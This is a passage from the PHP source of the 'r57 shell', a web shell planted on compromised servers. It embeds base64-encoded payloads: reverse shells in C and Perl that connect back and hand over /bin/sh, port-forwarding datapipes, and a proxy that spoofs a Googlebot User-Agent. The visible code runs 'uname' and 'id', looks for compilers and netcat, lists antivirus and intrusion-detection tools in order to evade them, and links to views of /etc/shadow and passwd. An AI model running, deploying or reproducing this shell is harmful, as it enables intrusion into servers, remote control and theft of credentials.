952hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT
953sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI
954kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi
955KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl
956OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
957 $back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC
958BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb
959SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd
960KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ
961sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC
962Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D
963QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp
964Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
965 $datapipe_c="I2luY2x1ZGUgPHN5cy90eXBlcy5oPg0KI2luY2x1ZGUgPHN5cy9zb2NrZXQuaD4NCiNpbmNsdWRlIDxzeXMvd2FpdC5oPg0KI2luY2
966x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPGVycm5vLmg+DQojaW5jb
967HVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxsaW51eC90aW1lLmg+DQojaWZkZWYgU1RSRVJST1INCmV4dGVybiBj
968aGFyICpzeXNfZXJybGlzdFtdOw0KZXh0ZXJuIGludCBzeXNfbmVycjsNCmNoYXIgKnVuZGVmID0gIlVuZGVmaW5lZCBlcnJvciI7DQpjaGFyICpzdHJ
969lcnJvcihlcnJvcikgIA0KaW50IGVycm9yOyAgDQp7IA0KaWYgKGVycm9yID4gc3lzX25lcnIpDQpyZXR1cm4gdW5kZWY7DQpyZXR1cm4gc3lzX2Vycm
970xpc3RbZXJyb3JdOw0KfQ0KI2VuZGlmDQoNCm1haW4oYXJnYywgYXJndikgIA0KICBpbnQgYXJnYzsgIA0KICBjaGFyICoqYXJndjsgIA0KeyANCiAga
971W50IGxzb2NrLCBjc29jaywgb3NvY2s7DQogIEZJTEUgKmNmaWxlOw0KICBjaGFyIGJ1Zls0MDk2XTsNCiAgc3RydWN0IHNvY2thZGRyX2luIGxhZGRy
972LCBjYWRkciwgb2FkZHI7DQogIGludCBjYWRkcmxlbiA9IHNpemVvZihjYWRkcik7DQogIGZkX3NldCBmZHNyLCBmZHNlOw0KICBzdHJ1Y3QgaG9zdGV
973udCAqaDsNCiAgc3RydWN0IHNlcnZlbnQgKnM7DQogIGludCBuYnl0Ow0KICB1bnNpZ25lZCBsb25nIGE7DQogIHVuc2lnbmVkIHNob3J0IG9wb3J0Ow
9740KDQogIGlmIChhcmdjICE9IDQpIHsNCiAgICBmcHJpbnRmKHN0ZGVyciwiVXNhZ2U6ICVzIGxvY2FscG9ydCByZW1vdGVwb3J0IHJlbW90ZWhvc3Rcb
975iIsYXJndlswXSk7DQogICAgcmV0dXJuIDMwOw0KICB9DQogIGEgPSBpbmV0X2FkZHIoYXJndlszXSk7DQogIGlmICghKGggPSBnZXRob3N0YnluYW1l
976KGFyZ3ZbM10pKSAmJg0KICAgICAgIShoID0gZ2V0aG9zdGJ5YWRkcigmYSwgNCwgQUZfSU5FVCkpKSB7DQogICAgcGVycm9yKGFyZ3ZbM10pOw0KICA
977gIHJldHVybiAyNTsNCiAgfQ0KICBvcG9ydCA9IGF0b2woYXJndlsyXSk7DQogIGxhZGRyLnNpbl9wb3J0ID0gaHRvbnMoKHVuc2lnbmVkIHNob3J0KS
978hhdG9sKGFyZ3ZbMV0pKSk7DQogIGlmICgobHNvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNC
979iAgICBwZXJyb3IoInNvY2tldCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBsYWRkci5zaW5fZmFtaWx5ID0gaHRvbnMoQUZfSU5FVCk7DQogIGxh
980ZGRyLnNpbl9hZGRyLnNfYWRkciA9IGh0b25sKDApOw0KICBpZiAoYmluZChsc29jaywgJmxhZGRyLCBzaXplb2YobGFkZHIpKSkgew0KICAgIHBlcnJ
981vcigiYmluZCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBpZiAobGlzdGVuKGxzb2NrLCAxKSkgew0KICAgIHBlcnJvcigibGlzdGVuIik7DQogIC
982AgcmV0dXJuIDIwOw0KICB9DQogIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0gLTEpIHsNCiAgICBwZXJyb3IoImZvcmsiKTsNCiAgICByZXR1cm4gMjA7D
983QogIH0NCiAgaWYgKG5ieXQgPiAwKQ0KICAgIHJldHVybiAwOw0KICBzZXRzaWQoKTsNCiAgd2hpbGUgKChjc29jayA9IGFjY2VwdChsc29jaywgJmNh
984ZGRyLCAmY2FkZHJsZW4pKSAhPSAtMSkgew0KICAgIGNmaWxlID0gZmRvcGVuKGNzb2NrLCJyKyIpOw0KICAgIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0
985gLTEpIHsNCiAgICAgIGZwcmludGYoY2ZpbGUsICI1MDAgZm9yazogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgICBzaHV0ZG93bihjc29jay
986wyKTsNCiAgICAgIGZjbG9zZShjZmlsZSk7DQogICAgICBjb250aW51ZTsNCiAgICB9DQogICAgaWYgKG5ieXQgPT0gMCkNCiAgICAgIGdvdG8gZ290c
98729jazsNCiAgICBmY2xvc2UoY2ZpbGUpOw0KICAgIHdoaWxlICh3YWl0cGlkKC0xLCBOVUxMLCBXTk9IQU5HKSA+IDApOw0KICB9DQogIHJldHVybiAy
988MDsNCg0KIGdvdHNvY2s6DQogIGlmICgob3NvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNCiA
989gICBmcHJpbnRmKGNmaWxlLCAiNTAwIHNvY2tldDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICBvYWRkci
9905zaW5fZmFtaWx5ID0gaC0+aF9hZGRydHlwZTsNCiAgb2FkZHIuc2luX3BvcnQgPSBodG9ucyhvcG9ydCk7DQogIG1lbWNweSgmb2FkZHIuc2luX2FkZ
991HIsIGgtPmhfYWRkciwgaC0+aF9sZW5ndGgpOw0KICBpZiAoY29ubmVjdChvc29jaywgJm9hZGRyLCBzaXplb2Yob2FkZHIpKSkgew0KICAgIGZwcmlu
992dGYoY2ZpbGUsICI1MDAgY29ubmVjdDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICB3aGlsZSAoMSkgew0
993KICAgIEZEX1pFUk8oJmZkc3IpOw0KICAgIEZEX1pFUk8oJmZkc2UpOw0KICAgIEZEX1NFVChjc29jaywmZmRzcik7DQogICAgRkRfU0VUKGNzb2NrLC
994ZmZHNlKTsNCiAgICBGRF9TRVQob3NvY2ssJmZkc3IpOw0KICAgIEZEX1NFVChvc29jaywmZmRzZSk7DQogICAgaWYgKHNlbGVjdCgyMCwgJmZkc3IsI
995E5VTEwsICZmZHNlLCBOVUxMKSA9PSAtMSkgew0KICAgICAgZnByaW50ZihjZmlsZSwgIjUwMCBzZWxlY3Q6ICVzXG4iLCBzdHJlcnJvcihlcnJubykp
996Ow0KICAgICAgZ290byBxdWl0MjsNCiAgICB9DQogICAgaWYgKEZEX0lTU0VUKGNzb2NrLCZmZHNyKSB8fCBGRF9JU1NFVChjc29jaywmZmRzZSkpIHs
997NCiAgICAgIGlmICgobmJ5dCA9IHJlYWQoY3NvY2ssYnVmLDQwOTYpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgICBpZiAoKHdyaXRlKG9zb2NrLG
998J1ZixuYnl0KSkgPD0gMCkNCglnb3RvIHF1aXQyOw0KICAgIH0gZWxzZSBpZiAoRkRfSVNTRVQob3NvY2ssJmZkc3IpIHx8IEZEX0lTU0VUKG9zb2NrL
999CZmZHNlKSkgew0KICAgICAgaWYgKChuYnl0ID0gcmVhZChvc29jayxidWYsNDA5NikpIDw9IDApDQoJZ290byBxdWl0MjsNCiAgICAgIGlmICgod3Jp
1000dGUoY3NvY2ssYnVmLG5ieXQpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgfQ0KICB9DQoNCiBxdWl0MjoNCiAgc2h1dGRvd24ob3NvY2ssMik7DQo
1001gIGNsb3NlKG9zb2NrKTsNCiBxdWl0MToNCiAgZmZsdXNoKGNmaWxlKTsNCiAgc2h1dGRvd24oY3NvY2ssMik7DQogcXVpdDA6DQogIGZjbG9zZShjZm
1002lsZSk7DQogIHJldHVybiAwOw0KfQ==";
1003 $datapipe_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgSU86OlNvY2tldDsNCnVzZSBQT1NJWDsNCiRsb2NhbHBvcnQgPSAkQVJHVlswXTsNCiRob3N0I
1004CAgICAgPSAkQVJHVlsxXTsNCiRwb3J0ICAgICAgPSAkQVJHVlsyXTsNCiRkYWVtb249MTsNCiRESVIgPSB1bmRlZjsNCiR8ID0gMTsNCmlmICgkZGFl
1005bW9uKXsgJHBpZCA9IGZvcms7IGV4aXQgaWYgJHBpZDsgZGllICIkISIgdW5sZXNzIGRlZmluZWQoJHBpZCk7IFBPU0lYOjpzZXRzaWQoKSBvciBkaWU
1006gIiQhIjsgfQ0KJW8gPSAoJ3BvcnQnID0+ICRsb2NhbHBvcnQsJ3RvcG9ydCcgPT4gJHBvcnQsJ3RvaG9zdCcgPT4gJGhvc3QpOw0KJGFoID0gSU86Ol
1007NvY2tldDo6SU5FVC0+bmV3KCdMb2NhbFBvcnQnID0+ICRsb2NhbHBvcnQsJ1JldXNlJyA9PiAxLCdMaXN0ZW4nID0+IDEwKSB8fCBkaWUgIiQhIjsNC
1008iRTSUd7J0NITEQnfSA9ICdJR05PUkUnOw0KJG51bSA9IDA7DQp3aGlsZSAoMSkgeyANCiRjaCA9ICRhaC0+YWNjZXB0KCk7IGlmICghJGNoKSB7IHBy
1009aW50IFNUREVSUiAiJCFcbiI7IG5leHQ7IH0NCisrJG51bTsNCiRwaWQgPSBmb3JrKCk7DQppZiAoIWRlZmluZWQoJHBpZCkpIHsgcHJpbnQgU1RERVJ
1010SICIkIVxuIjsgfSANCmVsc2lmICgkcGlkID09IDApIHsgJGFoLT5jbG9zZSgpOyBSdW4oXCVvLCAkY2gsICRudW0pOyB9IA0KZWxzZSB7ICRjaC0+Y2
1011xvc2UoKTsgfQ0KfQ0Kc3ViIFJ1biB7DQpteSgkbywgJGNoLCAkbnVtKSA9IEBfOw0KbXkgJHRoID0gSU86OlNvY2tldDo6SU5FVC0+bmV3KCdQZWVyQ
1012WRkcicgPT4gJG8tPnsndG9ob3N0J30sJ1BlZXJQb3J0JyA9PiAkby0+eyd0b3BvcnQnfSk7DQppZiAoISR0aCkgeyBleGl0IDA7IH0NCm15ICRmaDsN
1013CmlmICgkby0+eydkaXInfSkgeyAkZmggPSBTeW1ib2w6OmdlbnN5bSgpOyBvcGVuKCRmaCwgIj4kby0+eydkaXInfS90dW5uZWwkbnVtLmxvZyIpIG9
1014yIGRpZSAiJCEiOyB9DQokY2gtPmF1dG9mbHVzaCgpOw0KJHRoLT5hdXRvZmx1c2goKTsNCndoaWxlICgkY2ggfHwgJHRoKSB7DQpteSAkcmluID0gIi
1015I7DQp2ZWMoJHJpbiwgZmlsZW5vKCRjaCksIDEpID0gMSBpZiAkY2g7DQp2ZWMoJHJpbiwgZmlsZW5vKCR0aCksIDEpID0gMSBpZiAkdGg7DQpteSgkc
1016m91dCwgJGVvdXQpOw0Kc2VsZWN0KCRyb3V0ID0gJHJpbiwgdW5kZWYsICRlb3V0ID0gJHJpbiwgMTIwKTsNCmlmICghJHJvdXQgICYmICAhJGVvdXQp
1017IHt9DQpteSAkY2J1ZmZlciA9ICIiOw0KbXkgJHRidWZmZXIgPSAiIjsNCmlmICgkY2ggJiYgKHZlYygkZW91dCwgZmlsZW5vKCRjaCksIDEpIHx8IHZ
1018lYygkcm91dCwgZmlsZW5vKCRjaCksIDEpKSkgew0KbXkgJHJlc3VsdCA9IHN5c3JlYWQoJGNoLCAkdGJ1ZmZlciwgMTAyNCk7DQppZiAoIWRlZmluZW
1019QoJHJlc3VsdCkpIHsNCnByaW50IFNUREVSUiAiJCFcbiI7DQpleGl0IDA7DQp9DQppZiAoJHJlc3VsdCA9PSAwKSB7IGV4aXQgMDsgfQ0KfQ0KaWYgK
1020CR0aCAgJiYgICh2ZWMoJGVvdXQsIGZpbGVubygkdGgpLCAxKSAgfHwgdmVjKCRyb3V0LCBmaWxlbm8oJHRoKSwgMSkpKSB7DQpteSAkcmVzdWx0ID0g
1021c3lzcmVhZCgkdGgsICRjYnVmZmVyLCAxMDI0KTsNCmlmICghZGVmaW5lZCgkcmVzdWx0KSkgeyBwcmludCBTVERFUlIgIiQhXG4iOyBleGl0IDA7IH0
1022NCmlmICgkcmVzdWx0ID09IDApIHtleGl0IDA7fQ0KfQ0KaWYgKCRmaCAgJiYgICR0YnVmZmVyKSB7KHByaW50ICRmaCAkdGJ1ZmZlcik7fQ0Kd2hpbG
1023UgKG15ICRsZW4gPSBsZW5ndGgoJHRidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJHRoLCAkdGJ1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+I
1024DApIHskdGJ1ZmZlciA9IHN1YnN0cigkdGJ1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfQ0Kd2hpbGUgKG15ICRs
1025ZW4gPSBsZW5ndGgoJGNidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJGNoLCAkY2J1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+IDApIHskY2J
10261ZmZlciA9IHN1YnN0cigkY2J1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfX19DQo=";
1027 $prx_pl="IyF1c3IvYmluL3BlcmwKdXNlIFNvY2tldDsKbXkgJHBvcnQgPSAkQVJHVlswXXx8MzEzMzc7Cm15ICRwcm90b2NvbCA9IGdldHByb3RvYn
1028luYW1lKCd0Y3AnKTsKbXkgJG15X2FkZHIgID0gc29ja2FkZHJfaW4gKCRwb3J0LCBJTkFERFJfQU5ZKTsKc29ja2V0IChTT0NLLCBBRl9JTkVULCBTT
10290NLX1NUUkVBTSwgJHByb3RvY29sKSBvciBkaWUgInNvY2tldCgpOiAkISI7CnNldHNvY2tvcHQgKFNPQ0ssIFNPTF9TT0NLRVQsIFNPX1JFVVNFQURE
1030UiwxICkgb3IgZGllICJzZXRzb2Nrb3B0KCk6ICQhIjsKYmluZCAoU09DSywgJG15X2FkZHIpIG9yIGRpZSAiYmluZCgpOiAkISI7Cmxpc3RlbiAoU09
1031DSywgU09NQVhDT05OKSBvciBkaWUgImxpc3RlbigpOiAkISI7CiRTSUd7J0lOVCd9ID0gc3ViIHsKY2xvc2UgKFNPQ0spOwpleGl0Owp9Owp3aGlsZS
1032AoMSkgewpuZXh0IHVubGVzcyBteSAkcmVtb3RlX2FkZHIgPSBhY2NlcHQgKFNFU1NJT04sIFNPQ0spOwpteSAoJGZpc3QsICRtZXRob2QsICRyZW1vd
1033GVfaG9zdCwgJHJlbW90ZV9wb3J0KSA9IGFuYWx5emVfcmVxdWVzdCgpOwppZihvcGVuX2Nvbm5lY3Rpb24gKFJFTU9URSwgJHJlbW90ZV9ob3N0LCAk
1034cmVtb3RlX3BvcnQpID09IDApIHsKY2xvc2UgKFNFU1NJT04pOwpuZXh0Owp9CnByaW50IFJFTU9URSAkZmlyc3Q7CnByaW50IFJFTU9URSAiVXNlci1
1035BZ2VudDogR29vZ2xlYm90LzIuMSAoK2h0dHA6Ly93d3cuZ29vZ2xlLmNvbS9ib3QuaHRtbClcbiI7CndoaWxlICg8U0VTU0lPTj4pIHsKbmV4dCBpZi
1036AoL1Byb3h5LUNvbm5lY3Rpb246LyB8fCAvVXNlci1BZ2VudDovKTsKcHJpbnQgUkVNT1RFICRfOwpsYXN0IGlmICgkXyA9fiAvXltcc1x4MDBdKiQvK
1037TsKfQpwcmludCBSRU1PVEUgIlxuIjsKJGhlYWRlciA9IDE7CndoaWxlICg8UkVNT1RFPikgewpwcmludCBTRVNTSU9OICRfOwppZiAoJGhlYWRlcikg
1038eyAgICAgCmlmICgkaGVhZGVyICYmICRfID1+IC9eW1xzXHgwMF0qJC8pIHsKJGhlYWRlciA9IDA7Cn0KfQp9CmNsb3NlIChSRU1PVEUpOwpjbG9zZSA
1039oU0VTU0lPTik7Cn0KY2xvc2UgKFNPQ0spOwpzdWIgYW5hbHl6ZV9yZXF1ZXN0IHsKbXkgKCRmaXN0LCAkdXJsLCAkcmVtb3RlX2hvc3QsICRyZW1vdG
1040VfcG9ydCwgJG1ldGhvZCk7CiRmaXJzdCA9IDxTRVNTSU9OPjsKJHVybCA9ICgkZmlyc3QgPX4gbXwoaHR0cDovL1xTKyl8KVswXTsKKCRtZXRob2QsI
1041CRyZW1vdGVfaG9zdCwgJHJlbW90ZV9wb3J0KSA9IAooJGZpcnN0ID1+IG0hKEdFVCkgaHR0cDovLyhbXi86XSspOj8oXGQqKSEgKTsKaWYgKCEkcmVt
1042b3RlX2hvc3QpIHsKY2xvc2UoU0VTU0lPTik7CmV4aXQ7Cn0KJHJlbW90ZV9wb3J0ID0gImh0dHAiIHVubGVzcyAoJHJlbW90ZV9wb3J0KTsKJGZpcnN
10430ID1+IHMvaHR0cDpcL1wvW15cL10rLy87CnJldHVybiAoJGZpcnN0LCAkbWV0aG9kLCAkcmVtb3RlX2hvc3QsICRyZW1vdGVfcG9ydCk7Cn0Kc3ViIG
10449wZW5fY29ubmVjdGlvbiB7Cm15ICgkaG9zdCwgJHBvcnQpID0gQF9bMSwyXTsKbXkgKCRkZXN0X2FkZHIsICRjdXIpOwppZiAoJHBvcnQgIX4gL15cZ
1045CskLykgewokcG9ydCA9IChnZXRzZXJ2YnluYW1lKCRwb3J0LCAidGNwIikpWzJdOwokcG9ydCA9IDgwIHVubGVzcyAoJHBvcnQpOwp9CiRob3N0ID0g
1046aW5ldF9hdG9uICgkaG9zdCkgb3IgcmV0dXJuIDA7CiRkZXN0X2FkZHIgPSBzb2NrYWRkcl9pbiAoJHBvcnQsICRob3N0KTsKc29ja2V0ICgkX1swXSw
1047gQUZfSU5FVCwgU09DS19TVFJFQU0sICRwcm90b2NvbCkgb3IgZGllICJzb2NrZXQoKSA6ICQhIjsKY29ubmVjdCAoJF9bMF0sICRkZXN0X2FkZHIpIG
10489yIHJldHVybiAwOwokY3VyID0gc2VsZWN0KCRfWzBdKTsgIAokfCA9IDE7CnNlbGVjdCgkY3VyKTsKcmV0dXJuIDE7Cn0=";
1049 if($unix) { if(!isset($_COOKIE['uname'])) {$uname = ex('uname -a');
1050setcookie('uname',$uname);
1051}else {$uname = $_COOKIE['uname'];
1052} if(!isset($_COOKIE['id'])) {$id = ex('id');
1053setcookie('id',$id);
1054}else {$id = $_COOKIE['id'];
1055} if($safe_mode) {$sysctl = '-';
1056} else if(isset($_COOKIE['sysctl'])) {$sysctl = $_COOKIE['sysctl'];
1057} else { $sysctl = ex('sysctl -n kern.ostype && sysctl -n kern.osrelease');
1058 if(empty($sysctl)) {$sysctl = ex('sysctl -n kernel.ostype && sysctl -n kernel.osrelease');
1059} if(empty($sysctl)) {$sysctl = '-';
1060} setcookie('sysctl',$sysctl);
1061 } } echo $head;
1062 echo '</head>';
1063 echo '<body><table width=100% cellpadding=0 cellspacing=0 bgcolor=#008000><tr><td bgcolor=#333333 width=160><font face=Verdana size=2>'.ws(2).'<font face=tahoma size=2><b>r57 shell '.$version.'</b></font></td><td bgcolor=#333333><font face=Verdana size=-2>';
1064 echo ws(2)."<b>".date ("d-m-Y H:i:s")."</b> Your IP: [<font color=blue>".gethostbyname($_SERVER["REMOTE_ADDR"])."</font>]";
1065 if(isset($_SERVER['X_FORWARDED_FOR'])){echo " X_FORWARDED_FOR: [<font color=red>".$_SERVER['X_FORWARDED_FOR']."</font>]";
1066} if(isset($_SERVER['CLIENT_IP'])){echo " CLIENT_IP: [<font color=red>".$_SERVER['CLIENT_IP']."</font>]";
1067} echo " Server IP: [<a href=".gethostbyname($_SERVER["HTTP_HOST"])." target=iframe><font color=blue>".gethostbyname($_SERVER["HTTP_HOST"])."</font></a>]";
1068 echo "<br>";
1069 echo ws(2)."PHP version: <b>".@phpversion()."</b>";
1070 $curl_on = @function_exists('curl_version');
1071 echo ws(2);
1072 echo "cURL: <b>".(($curl_on)?("<font color=green>ON</font>"):("<font color=red>Kapali</font>"));
1073 echo "</b>".ws(2);
1074 echo "MySQL: <b>";
1075 $mysql_on = @function_exists('mysql_connect');
1076 if($mysql_on){ echo "<font color=green>ON</font>";
1077}else {echo "<font color=red>Kapali</font>";
1078} echo "</b>".ws(2);
1079 echo "MSSQL: <b>";
1080 $mssql_on = @function_exists('mssql_connect');
1081 if($mssql_on){echo "<font color=green>ON</font>";
1082}else{echo "<font color=red>Kapali</font>";
1083} echo "</b>".ws(2);
1084 echo "PostgreSQL: <b>";
1085 $pg_on = @function_exists('pg_connect');
1086 if($pg_on){echo "<font color=green>ON</font>";
1087}else{echo "<font color=red>Kapali</font>";
1088} echo "</b>".ws(2);
1089 echo "Oracle: <b>";
1090 $ora_on = @function_exists('ocilogon');
1091 if($ora_on){echo "<font color=green>ON</font>";
1092}else{echo "<font color=red>Kapali</font>";
1093} echo "</b><br>".ws(2);
1094 echo "Safe_mode: <b>";
1095 echo (($safe_mode)?("<font color=green>ON</font>"):("<font color=red>Kapali</font>"));
1096 echo "</b>".ws(2);
1097 echo "Open_basedir: <b>";
1098 if($open_basedir) {if (''==($df=@ini_get('open_basedir'))) {echo "<font color=red>ini_get disable!</font></b>";
1099}else {echo "<font color=green>$df</font></b>";
1100};
1101} else {echo "<font color=red>NONE</font></b>";
1102} echo ws(2)."Safe_mode_exec_dir: <b>";
1103 if(@function_exists('ini_get')) {if (''==($df=@ini_get('safe_mode_exec_dir'))) {echo "<font color=red>NONE</font></b>";
1104}else {echo "<font color=green>$df</font></b>";
1105};
1106} else {echo "<font color=red>ini_get disable!</font></b>";
1107} echo ws(2)."Safe_mode_include_dir: <b>";
1108 if(@function_exists('ini_get')) {if (''==($df=@ini_get('safe_mode_include_dir'))) {echo "<font color=red>NONE</font></b>";
1109}else {echo "<font color=green>$df</font></b>";
1110};
1111} else {echo "<font color=red>ini_get disable!</font></b>";
1112} echo "<br>".ws(2);
1113 echo "Disable functions : <b>";
1114$df='ini_get disable!';
1115 if((@function_exists('ini_get')) &&(''==($df=@ini_get('disable_functions')))){echo "<font color=red>NONE</font></b>";
1116}else{echo "<font color=red>$df</font></b>";
1117} $free = @diskfreespace($dir);
1118 if (!$free) {$free = 0;
1119} $all = @disk_total_space($dir);
1120 if (!$all) {$all = 0;
1121} echo "<br>".ws(2)."Free space : <b>".view_size($free)."</b> Total space: <b>".view_size($all)."</b>";
1122 $ust='';
1123 if($unix &&!$safe_mode){ if (which('gcc')) {$ust.="gcc,";
1124} if (which('cc')) {$ust.="cc,";
1125} if (which('ld')) {$ust.="ld,";
1126} if (which('php')) {$ust.="php,";
1127} if (which('perl')) {$ust.="perl,";
1128} if (which('python')) {$ust.="python,";
1129} if (which('ruby')) {$ust.="ruby,";
1130} if (which('make')) {$ust.="make,";
1131} if (which('tar')) {$ust.="tar,";
1132} if (which('nc')) {$ust.="netcat,";
1133} if (which('locate')) {$ust.="locate,";
1134} if (which('suidperl')) {$ust.="suidperl,";
1135} } if (@function_exists('pcntl_exec')) {$ust.="pcntl_exec,";
1136} if($ust){echo "<br>".ws(2).$lang[$language.'_text137'].": <font color=blue>".$ust."</font>";
1137} $ust='';
1138 if($unix &&!$safe_mode){ if (which('kav')) {$ust.="kav,";
1139} if (which('nod32')) {$ust.="nod32,";
1140} if (which('bdcored')) {$ust.="bitdefender,";
1141} if (which('uvscan')) {$ust.="mcafee,";
1142} if (which('sav')) {$ust.="symantec,";
1143} if (which('drwebd')) {$ust="drwebd,";
1144} if (which('clamd')) {$ust.="clamd,";
1145} if (which('rkhunter')) {$ust.="rkhunter,";
1146} if (which('chkrootkit')) {$ust.="chkrootkit,";
1147} if (which('iptables')) {$ust.="iptables,";
1148} if (which('ipfw')) {$ust.="ipfw,";
1149} if (which('tripwire')) {$ust.="tripwire,";
1150} if (which('shieldcc')) {$ust.="stackshield,";
1151} if (which('portsentry')) {$ust.="portsentry,";
1152} if (which('snort')) {$ust.="snort,";
1153} if (which('ossec')) {$ust.="ossec,";
1154} if (which('lidsadm')) {$ust.="lidsadm,";
1155} if (which('tcplodg')) {$ust.="tcplodg,";
1156} if (which('tripwire')) {$ust.="tripwire,";
1157} if (which('sxid')) {$ust.="sxid,";
1158} if (which('logcheck')) {$ust.="logcheck,";
1159} if (which('logwatch')) {$ust.="logwatch,";
1160} } if (@function_exists('apache_get_modules') &&@in_array('mod_security',apache_get_modules())) {$ust.="mod_security,";
1161} if($ust){echo "<br>".ws(2).$lang[$language.'_text138'].": <font color=red>$ust</font>";
1162} echo "<br>".ws(2)."</b>";
1163 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpinfo title=\"".$lang[$language.'_text46']."\"><b>phpinfo</b></a> ".$rb;
1164 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpini title=\"".$lang[$language.'_text47']."\"><b>php.ini</b></a> ".$rb;
1165 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?cpu title=\"".$lang[$language.'_text50']."\"><b>cpu</b></a> ".$rb;
1166 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?mem title=\"".$lang[$language.'_text51']."\"><b>mem</b></a> ".$rb;
1167 if(!$unix) { echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?systeminfo title=\"".$lang[$language.'_text50']."\"><b>systeminfo</b></a> ".$rb;
1168 }else{ echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?syslog title=\"View syslog.conf\"><b>syslog</b></a> ".$rb;
1169 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?resolv title=\"View resolv\"><b>resolv</b></a> ".$rb;
1170 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?hosts title=\"View hosts\"><b>hosts</b></a> ".$rb;
1171 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?shadow title=\"View shadow\"><b>shadow</b></a> ".$rb;
1172 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?passwd title=\"".$lang[$language.'_text95']."\"><b>passwd</b></a> ".$rb;
1173 } echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?tmp title=\"".$lang[$language.'_text48']."\"><b>tmp</b></a> ".$rb;
1174 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?delete title=\"".$lang[$language.'_text49']."\"><b>delete</b></a> ".$rb;
1175 if($unix &&!$safe_mode) { echo "<br>".ws(2)."</b>";
1176 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?procinfo title=\"View procinfo\"><b>procinfo</b></a> ".$rb;
1177 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?version title=\"View proc version\"><b>version</b></a> ".$rb;
1178 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?free title=\"View mem free\"><b>free</b></a> ".$rb;
